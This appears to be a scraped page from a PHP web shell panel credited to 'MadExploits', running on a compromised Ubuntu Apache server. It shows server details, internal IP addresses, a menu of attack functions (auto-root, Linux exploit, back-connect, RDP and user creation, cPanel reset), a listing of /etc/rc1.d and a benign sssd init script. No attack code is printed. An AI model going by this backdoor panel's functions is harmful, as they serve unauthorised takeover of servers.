Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
rc1.d /
[ HOME SHELL ]
Name
Size
Permission
Action
K01apache-htcacheclean
2.43
KB
-rwxr-xr-x
K01apache2
7.99
KB
-rwxr-xr-x
K01irqbalance
2.58
KB
-rwxr-xr-x
K01iscsid
1.47
KB
-rwxr-xr-x
K01krb5-admin-server
3.33
KB
-rwxr-xr-x
K01krb5-kdc
3.02
KB
-rwxr-xr-x
K01lvm2-lvmpolld
586
B
-rwxr-xr-x
K01mariadb
6.59
KB
-rwxr-xr-x
K01multipath-tools
2.76
KB
-rwxr-xr-x
K01nginx
4.47
KB
-rwxr-xr-x
K01nmbd
1.89
KB
-rwxr-xr-x
K01open-iscsi
2.38
KB
-rwxr-xr-x
K01open-vm-tools
1.8
KB
-rwxr-xr-x
K01postgresql
1.46
KB
-rwxr-xr-x
K01samba-ad-dc
2.21
KB
-rwxr-xr-x
K01smbd
2.01
KB
-rwxr-xr-x
K01sssd
2.5
KB
-rwxr-xr-x
K01ufw
2.03
KB
-rwxr-xr-x
K01uuidd
1.28
KB
-rwxr-xr-x
K01vsftpd
2.02
KB
-rwxr-xr-x
K01winbind
1.45
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : K01sssd
#!/bin/sh ### BEGIN INIT INFO # Provides: sssd # Required-Start: $remote_fs $syslog # Required-Stop: $remote_fs $syslog # Should-Start: $named # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: System Security Services Daemon # Description: Provides a set of daemons to manage access to # remote directories and authentication # mechanisms. It provides an NSS and PAM interface # toward the system and a pluggable backend system # to connect to multiple different account sources. ### END INIT INFO # start on filesystem # stop on runlevel [06] DESCRIPTION="System Security Services Daemon" PATH=/bin:/usr/bin:/sbin:/usr/sbin NAME=sssd DAEMON_OPTS="" DAEMON=/usr/sbin/$NAME PIDFILE=/var/run/$NAME.pid # Load the VERBOSE setting and other rcS variables . /lib/init/vars.sh # Define LSB log_* functions. # Depend on lsb-base (>= 3.2-14) to ensure that this file is present # and status_of_proc is working. . /lib/lsb/init-functions if [ -f /etc/default/sssd ] ; then . /etc/default/sssd fi initdmain() { case "$1" in start) [ "$VERBOSE" != no ] && log_daemon_msg "Starting $DESCRIPTION" "$NAME" start_daemon -p $PIDFILE $DAEMON $DAEMON_OPTS RC=$? case "$RC" in 0) [ "$VERBOSE" != no ] && log_end_msg $RC ;; *) # Report error also when VERBOSE=no log_daemon_msg "Starting $DESCRIPTION" "$NAME" log_end_msg $RC ;; esac ;; stop) [ "$VERBOSE" != no ] && log_daemon_msg "Stopping $DESCRIPTION" "$NAME" killproc -p $PIDFILE $DAEMON RC=$? case "$RC" in 0) [ "$VERBOSE" != no ] && log_end_msg $RC ;; *) # Report error also when VERBOSE=no log_daemon_msg "Stopping $DESCRIPTION" "$NAME" log_end_msg $RC ;; esac ;; force-reload|restart) $0 stop $0 start ;; status) status_of_proc -p $PIDFILE $DAEMON $NAME && exit 0 || exit $? ;; *) echo "Usage: /etc/init.d/$NAME {start|stop|restart|force-reload|status}" exit 1 ;; esac } initdmain $@ exit 0
Close